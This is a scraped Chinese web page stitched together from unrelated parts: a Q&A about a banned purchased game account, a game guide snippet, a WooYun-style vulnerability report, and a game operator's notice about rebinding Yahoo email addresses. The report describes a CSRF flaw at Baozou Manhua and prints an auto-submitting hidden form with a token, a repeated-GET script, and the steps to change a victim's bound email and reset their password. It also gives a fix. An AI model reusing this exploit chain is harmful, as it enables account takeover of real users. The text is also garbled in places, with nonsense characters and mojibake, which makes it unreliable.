天书世界改密码qq绑定邮箱更改了怎么改

我在5173交易平台购买了一个哥们网天书世界的游戏账号,手机、邮箱都修改绑定了,上游戏玩了一个多小_百度知道
我在5173交易平台购买了一个哥们网天书世界的游戏账号,手机、邮箱都修改绑定了,上游戏玩了一个多小
我在5173交易平台购买了一个哥们网天书世界的游戏账号,手机、邮箱都修改绑定了,上游戏玩了一个多小时,突然就掉线了,再缉穿光费叱渡癸杀含辑登录就登不上了,说是该帐号有盗取嫌疑,账号被封停了。我找5173的交易客服,他们给我的答复就是已经冻结了卖家的5173账户,等卖家找5173的时候再联系我,我该怎么办,一直等吗?纠结死了,求高人指点。才刚刚注册的百度提问,悬赏值给全部
提问者采纳
很有缉穿光费叱渡癸杀含辑可能找不回了,5173挺不安全的,冻结了他的账户,但是钱已经到了他银行卡了,账户以后不需要了,在需要的话可以在注册一个。
提问者评价
太给力了,你的回答完美地解决了我的问题,非常感谢!
其他类似问题
按默认排序
其他2条回答
只能等那个去解冻,没办法
为您推荐:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁热门搜索:
当前位置:
天书世界为什么血量变少了 战斗力变少了怎么办
15:10 作者:玩坏的助手
搜索"8090网页游戏"
  天书世界游戏中,经常有玩家会发现,战力和血量突然少了几千,这到底是什么原因造成的一直弄不明白。下面就跟着小编来要看一下战力减少的原因吧。
  3个成员同时在线,就+20%生命,这正好就是几千点,请酒什么的基本可以忽略了,起码到现在没有请过也没有被请过。
  以上就是天书世界战力和血量突然变少的原因了,希望能够帮助到大家,祝大家游戏愉快。
?8090欢迎您
开服列表:
您上次玩过的游戏:
?最新开服表
健康游戏忠告:抵制不良游戏 拒绝盗版游戏 注意自我保护 谨防受骗上当 适度游戏益脑 沉迷游戏伤身 合理安排时间 享受健康生活
   苏ICP备号-2
Copyright ©
软件名称:名通8090游戏运营平台软件   版本号:V1.0   江苏名通信息科技有限公司暴走漫画#Csrf防御不当可利用此漏洞修改他人绑定邮箱从而重置密码
首先在验证邮箱的地方 修改一下邮箱并且抓包。 此时我的邮箱是乱填的
提交地址:/users/8311358
提交数据:
-----------------------------
Content-Disposition: form- name=&utf8&
-----------------------------
Content-Disposition: form- name=&_method&
-----------------------------
Content-Disposition: form- name=&authenticity_token&
FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=
-----------------------------
Content-Disposition: form- name=&user[email]&
-----------------------------
Content-Disposition: form- name=&commit&
?????1&????&
这是有token的
接着我写一个表单
&form id=&csrf&
action=&/users/用户id& method=&post&&
&input type=hidden name=&utf8& value=&a??&&
&input type=hidden name=&_method& value=&put&&
&input type=hidden name=&authenticity_token& value=&FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=&&
&input type=hidden name=&user[email]& value=&你的邮箱&&
&input type=hidden name=&commit& value=&?????1&????&&&
document.getElementById('csrf').submit();
再点击发送激活邮件 抓包
GET:/my/resend/用户ID
此时我将表单的 email 换成我的有效邮箱
接着打开并且抓包
直接提示修改成功 无视token
可以看到 先get访问了 a.htm 然后再post提交到 暴走漫画
现在邮箱改掉了 只需要 访问/my/resend/8311358 就行
至于这个 做个弹窗到新窗口 弹到b.htm b.htm 用js写个每一秒GET访问一次
/my/resend/8311358
这时我被弹到了b.htm, 被弹到b.htm后会很多次get访问/my/resend/8311358
接着我就收到了激活邮件
现在被激活了 就可以去/fetchpass 发送一个重置密码邮件。
=。= 接着就可以改他的密码了
修复方案:
可以像上次那个一样 WooYun: 暴走漫画越权发暴漫作品(拿王尼玛帐号测试)利用打赏功能发财致富走上人生巅峰
把token带到 http头部 或者验证一下referer。
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架,或者当前配置为不显示嵌入式框架。手机访问官网:jxsj.
《剑侠世界》婉拒18岁以下
未成年用户进入!
维护时间:
8:00 - 9:30
客服电话:
扫描微信码
添加剑侠世界为微信好友
请雅虎邮箱用户修改绑定邮箱地址
尊敬的玩家:
  您好!
  由于雅虎邮箱将于日起停止服务,如您将雅虎邮箱作为绑定邮箱使用,为保证您账号绑定邮箱今后的正常使用,建议您尽快登陆个人中心()修改绑定邮箱资料。
温馨提示,雅虎邮箱范例:.cn   
一、通过绑定手机修改:
登陆个人中心后点击我的账号安全,选择修改绑定邮箱==&选择通过绑定手机修改,网页回填绑定手机验证码后进行修改。
通过原绑定邮箱修改:
登陆个人中心后点击我的账号安全,选择修改绑定邮箱==&选择通过原绑定邮箱修改,点击验证邮件链接地址后进行修改。
三、如以上方式您都无法使用,请向客服申请修改绑定手机业务:&
  您在修改邮箱地址过程中如有任何疑问,客服中心为您提供即时咨询:
  网游戏客服中心

我要回帖

更多关于 战网绑定邮箱修改 的文章

 

随机推荐